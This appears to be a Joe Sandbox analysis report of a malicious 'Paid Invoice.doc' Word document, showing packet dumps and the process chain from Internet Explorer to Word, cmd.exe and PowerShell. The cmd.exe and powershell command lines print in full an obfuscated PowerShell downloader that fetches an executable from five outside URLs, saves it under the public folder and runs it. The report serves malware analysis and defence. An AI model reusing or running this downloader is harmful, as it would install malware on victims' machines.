Feb 12, 2018 21:34:41.679538012 CET	25	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Feb 12, 2018 21:34:41.984241009 CET	26	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Feb 12, 2018 21:34:41.984258890 CET	28	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 8d 00 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 56 31 ea 24 e5 02 e5 02 00 00 00 00 00 00 00 00 00 00 Data Ascii: jDdV1$ps>A? 8AC=>: 1"bZak2
Feb 12, 2018 21:34:41.984266996 CET	28	IN	Data Raw: 4e a7 94 53 6f 6c fd 3e f6 27 72 b3 e2 48 3a 5e 4b 56 f9 93 33 f5 fe 9e a7 54 1d 65 6a 0d d9 f2 59 f6 f6 4c a7 d4 3d b5 4f 6c fb f2 5c 49 9d 54 8d 0b dd 63 99 4c b3 13 1d 98 3f f2 f2 3b 8b 94 ba c7 72 42 a4 d7 fb a3 a2 a7 12 94 53 24 bd 6c e2 e5 Data Ascii: NSol>'rH:^KV3TejYL=Ol\ITcL?;rBS$lojS#)(s;;PSeXIJ^P77Ps+)3';Bc{DJXTNC##SFdJZyJzt~yARR"v2z
Feb 12, 2018 21:34:42.251990080 CET	29	IN	Data Raw: 7b 30 2d 35 ce ed f9 05 73 39 76 41 fd 50 6a aa 8e 68 8d d5 77 23 43 49 96 a9 ab e3 e7 cd 43 83 94 b0 72 53 e9 d0 19 4f 0b 5e 90 92 de e1 0d 47 6a 7f 27 49 4c 76 cc e0 d3 0f 7a ab 57 59 be 82 17 0e 8e 9c 11 a6 b4 cc 1d 14 0a 91 42 41 ff d1 d3 29 Data Ascii: {0-5s9vAPjhw#CICrSO^Gj'ILvzWYBA)J$b2YWJ)vJ?H7R%eD;5*JuItq\|3xk5r^aE"cj8srVsX6x(X/OJXL izmN,[\|a
Feb 12, 2018 21:34:42.487931967 CET	31	IN	Data Raw: 6e b3 7d 7e de 0e 2e bc e9 27 05 75 38 b6 ba 5b 3d 57 af d7 ec dc e5 67 f0 6c 59 e7 36 97 7f 83 29 7c 45 f5 d8 d2 21 13 49 7d 24 fd 9b 4f e1 0b da 4d fb 90 94 b0 42 31 25 12 c1 1b 36 99 5c fc 31 2f 21 91 5c 4a c0 b2 5e f0 2b 7d 49 2b 61 c9 a2 97 Data Ascii: n}~.'u8[=WglY6)\|E!I}$OMB1%6\1/!\J^+}I+aeY!/y1,6KcR@J) %RH)@JH %@J)RH %@J) %R@J)RH %@J)RH)@JH %`R2cj
Feb 12, 2018 21:34:42.487951040 CET	32	IN	Data Raw: 83 20 d0 29 d5 e5 89 41 7d df a7 89 1c a5 c9 5b 00 50 52 2a 30 13 94 53 a1 48 c5 51 25 72 20 55 b1 0d 08 c5 54 26 74 22 76 ec 21 66 48 8f 63 0a 9c c6 5e b3 95 72 45 75 19 73 fc 46 9c 26 49 2c a4 01 c0 86 02 b9 81 2e c4 0d fb 64 ee 4d 73 94 ee 44 Data Ascii: )A}[PR0SHQ%r UT&t"v!fHc^rEusF&I,.dMsD9WL3A/F1w1>K~S_!d+Tq%J!B0p8N`bV)p+yZ2Ebnw)4m"N>j\i0}?Js
Feb 12, 2018 21:34:42.487958908 CET	33	IN	Data Raw: a7 53 19 95 fe 7d b4 07 b9 a1 58 c0 5a a9 ff 5e d2 73 f2 2c 0c 9a 66 b8 9a 67 81 af 5f 66 53 f9 83 9e 4c a7 53 e8 ff fe 59 9a 98 66 fd 3a 49 f2 77 42 eb c3 44 18 5b a8 f6 73 fb 7b 66 95 82 fd 39 4c 73 94 fe 07 4a 24 c9 51 aa 9d 9f 7d d9 b7 ac ee Data Ascii: S}XZ^s,fg_fSLSYf:IwBD[s{f9LsJ$Q}luuR^(_&TUfm%X{=w:v0s~icY'j&qy%,OFMZm`0`l%*I^aZO;\dWKG2lC

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: iexplore.exe PID: 3388 Parent PID: 548

General

Start time:	21:34:48
Start date:	12/02/2018
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x1060000
File size:	815312 bytes
MD5 hash:	CA1F703CD665867E8132D2946FB55750
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: iexplore.exe PID: 3444 Parent PID: 3388

General

Start time:	21:34:48
Start date:	12/02/2018
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3388 CREDAT:275457 /prefetch:2
Imagebase:	0x1060000
File size:	815312 bytes
MD5 hash:	CA1F703CD665867E8132D2946FB55750
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: ssvagent.exe PID: 3504 Parent PID: 3444

General

Start time:	21:34:49
Start date:	12/02/2018
Path:	C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe
Wow64 process (32bit):	false
Commandline:	'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Imagebase:	0x1380000
File size:	53312 bytes
MD5 hash:	0953A0264879FD1E655B75B63B9083B7
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: WINWORD.EXE PID: 3984 Parent PID: 3388

General

Start time:	21:35:17
Start date:	12/02/2018
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\Paid Invoice.doc
Imagebase:	0x2f910000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 4036 Parent PID: 3984

General

Start time:	21:35:20
Start date:	12/02/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megaxl5M+l'+'5MusmgY+mgY.mgY+mgYcom/v1/images/amgY+mgYrmgY+mgYticmgY+mgYlel5M+l5Mml5M+l5MgY+mgY/mgY+mgYIpjKmgY+mgYJT/?http:l5M+l5MmgY+mgY//wngS+ngSww.umbriawi'+'f'+'i.it/Ue8J/?http://ersmgY+l'+'5M+l5MmgYte.vipl5M+l5Mmgl5M+l5MY+mgY/nH0tmgY+mgYN/Eny.Sl5M+l5Mplit(Eny?mgY+mgYEmgY+mg'+'Yny);tL8SDl5M+l5MC = ngS+ngStmgY+mgYL8emgY+mgYl5M+l5Mnv:l5M+l5Mpublic + EnyFVkEnymgY+mgY + mgY+mgYtL8NmgY+mgYSB + mgY+mgY(mgY+mgYE'+'nngl5M+l5MS+ngS'+'y.l5M+l5MexEny+'+'EnyeEny);foreamgY+mgYch(tL8asfc in mgY+mgYtLmg'+'Y+mgY8AngS+ngSDC'+'X){try{tL8YYU.ls2mgYngS+ngS+mgYDo0qIWnmgY+mgYl0qmgY+mgYngSl5M'+'+l5M+ngSImgY+mg'+'YOal5M+'+'l5MmgY+mgYdF'+'ImgY+mgY0mgY+mgYqIlmgY+mgYels2(t'+'L8a'+'sfl5M+l5Mc.lmgY+mgYsmgY+m'+'gY2ToStr0qIi0ql5M+l5MINgls2mgl5M+l5MY+mgngS+'+'ngSY()mgY+mgY, mgY+mgYtL8SDCl5M+l5MmgY+mgY);&(EnyInmgY+mgl5M+l5MYvoEmgY+mgl5M+l5MYny+EnykEmgY+mgYnl5M'+'+l5My+EnmgY+m'+'gYyngS+ngSe-IngS+ngStemmgY+mgYEl5M+l5Mny)(l5M+l5MtmgY+mgYL8mgY+mgY'+'l5M+l5MSDCmgYngS+nl5M+l5'+'MgS+mgY);bremgY+mg'+'Yam'+'gY+ng'+'S+ngSmgYkmgY+'+'mgY;}mgY+mgYcatcmgY+mgYh{}}mgY) -CRePLace ([ChAR]7'+'0+[ChAR]86ngS+ngS+[ChAR]1l5'+'M+l5M07),[ChAR]92-rePLAce([ChAR]116+[ChAR]76+[ChAR]56ngS+nl5M+l5MgS),[ChAngS+ngSR]3l5M+l5M6 -rePLAce'+' mgYls2mgY,[ChAR'+']34 -rePLAce ([ChAR]6l5M+l5MngS+ngS9+[l5M+l5MChAR]110+[ChAR]121'+'),[ChA'+'R]39 -rePLAc'+'e ([ChAR]48+[ChAR]113'+'+[ChAR]7ngS+ngS3),[C'+'hAR]96)f2i& ( nhl5M+l5MHENv:publiC[13]+nhHen'+'V:puBliC[5]+mgYxmgY)ngS).rel5M+l5MplacE(n'+'gSmgYngS,[STRIl5M+l5MNg][ChaR]39).replacE(([ChaR]1'+'10+[l5M+l5MChaR]104+[ChaR]72)'+',ngSCxsnl5M+l5MgS).replacE('+'ngSf2ingS,'+'ngSpwDl5M+l5Mn'+'gS) pwD&((VARIABl5M+l5Mle ngSmdrngS).l5M+l5MNamE[3,11,2'+']-JOiNngSngS)l5M)-rePlACE ([cHar]67+[cHar]120+[cHar]115),[cHar]36 -rePlACE ([cHar]110+[cHar]103+[cHar]83),[cH'+'ar]39-CrepLacE ([cHar]112+[cHar]119+[cHar]68),[cHar]124)sdP .( 50lP'+'SHoMe[21]+50lPSHOMe[34]+l5Mxl5M)') -RePlaCe '50l',[Char]36 -crePLAcE 'l5M',[Char]39 -RePlaCe 'sdP',[Char]124) )
Imagebase:	0x4a010000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 2088 Parent PID: 4036

General

Start time:	21:35:21
Start date:	12/02/2018
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megaxl5M+l'+'5MusmgY+mgY.mgY+mgYcom/v1/images/amgY+mgYrmgY+mgYticmgY+mgYlel5M+l5Mml5M+l5MgY+mgY/mgY+mgYIpjKmgY+mgYJT/?http:l5M+l5MmgY+mgY//wngS+ngSww.umbriawi'+'f'+'i.it/Ue8J/?http://ersmgY+l'+'5M+l5MmgYte.vipl5M+l5Mmgl5M+l5MY+mgY/nH0tmgY+mgYN/Eny.Sl5M+l5Mplit(Eny?mgY+mgYEmgY+mg'+'Yny);tL8SDl5M+l5MC = ngS+ngStmgY+mgYL8emgY+mgYl5M+l5Mnv:l5M+l5Mpublic + EnyFVkEnymgY+mgY + mgY+mgYtL8NmgY+mgYSB + mgY+mgY(mgY+mgYE'+'nngl5M+l5MS+ngS'+'y.l5M+l5MexEny+'+'EnyeEny);foreamgY+mgYch(tL8asfc in mgY+mgYtLmg'+'Y+mgY8AngS+ngSDC'+'X){try{tL8YYU.ls2mgYngS+ngS+mgYDo0qIWnmgY+mgYl0qmgY+mgYngSl5M'+'+l5M+ngSImgY+mg'+'YOal5M+'+'l5MmgY+mgYdF'+'ImgY+mgY0mgY+mgYqIlmgY+mgYels2(t'+'L8a'+'sfl5M+l5Mc.lmgY+mgYsmgY+m'+'gY2ToStr0qIi0ql5M+l5MINgls2mgl5M+l5MY+mgngS+'+'ngSY()mgY+mgY, mgY+mgYtL8SDCl5M+l5MmgY+mgY);&(EnyInmgY+mgl5M+l5MYvoEmgY+mgl5M+l5MYny+EnykEmgY+mgYnl5M'+'+l5My+EnmgY+m'+'gYyngS+ngSe-IngS+ngStemmgY+mgYEl5M+l5Mny)(l5M+l5MtmgY+mgYL8mgY+mgY'+'l5M+l5MSDCmgYngS+nl5M+l5'+'MgS+mgY);bremgY+mg'+'Yam'+'gY+ng'+'S+ngSmgYkmgY+'+'mgY;}mgY+mgYcatcmgY+mgYh{}}mgY) -CRePLace ([ChAR]7'+'0+[ChAR]86ngS+ngS+[ChAR]1l5'+'M+l5M07),[ChAR]92-rePLAce([ChAR]116+[ChAR]76+[ChAR]56ngS+nl5M+l5MgS),[ChAngS+ngSR]3l5M+l5M6 -rePLAce'+' mgYls2mgY,[ChAR'+']34 -rePLAce ([ChAR]6l5M+l5MngS+ngS9+[l5M+l5MChAR]110+[ChAR]121'+'),[ChA'+'R]39 -rePLAc'+'e ([ChAR]48+[ChAR]113'+'+[ChAR]7ngS+ngS3),[C'+'hAR]96)f2i& ( nhl5M+l5MHENv:publiC[13]+nhHen'+'V:puBliC[5]+mgYxmgY)ngS).rel5M+l5MplacE(n'+'gSmgYngS,[STRIl5M+l5MNg][ChaR]39).replacE(([ChaR]1'+'10+[l5M+l5MChaR]104+[ChaR]72)'+',ngSCxsnl5M+l5MgS).replacE('+'ngSf2ingS,'+'ngSpwDl5M+l5Mn'+'gS) pwD&((VARIABl5M+l5Mle ngSmdrngS).l5M+l5MNamE[3,11,2'+']-JOiNngSngS)l5M)-rePlACE ([cHar]67+[cHar]120+[cHar]115),[cHar]36 -rePlACE ([cHar]110+[cHar]103+[cHar]83),[cH'+'ar]39-CrepLacE ([cHar]112+[cHar]119+[cHar]68),[cHar]124)sdP .( 50lP'+'SHoMe[21]+50lPSHOMe[34]+l5Mxl5M)') -RePlaCe '50l',[Char]36 -crePLAcE 'l5M',[Char]39 -RePlaCe 'sdP',[Char]124) )
Imagebase:	0x21d30000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Software Vulnerabilities:

Networking:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

No static file info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: iexplore.exe PID: 3388 Parent PID: 548

General

Chronological Activities

Analysis Process: iexplore.exe PID: 3444 Parent PID: 3388

General

Chronological Activities

Analysis Process: ssvagent.exe PID: 3504 Parent PID: 3444

General

Chronological Activities

Analysis Process: WINWORD.EXE PID: 3984 Parent PID: 3388

General

Chronological Activities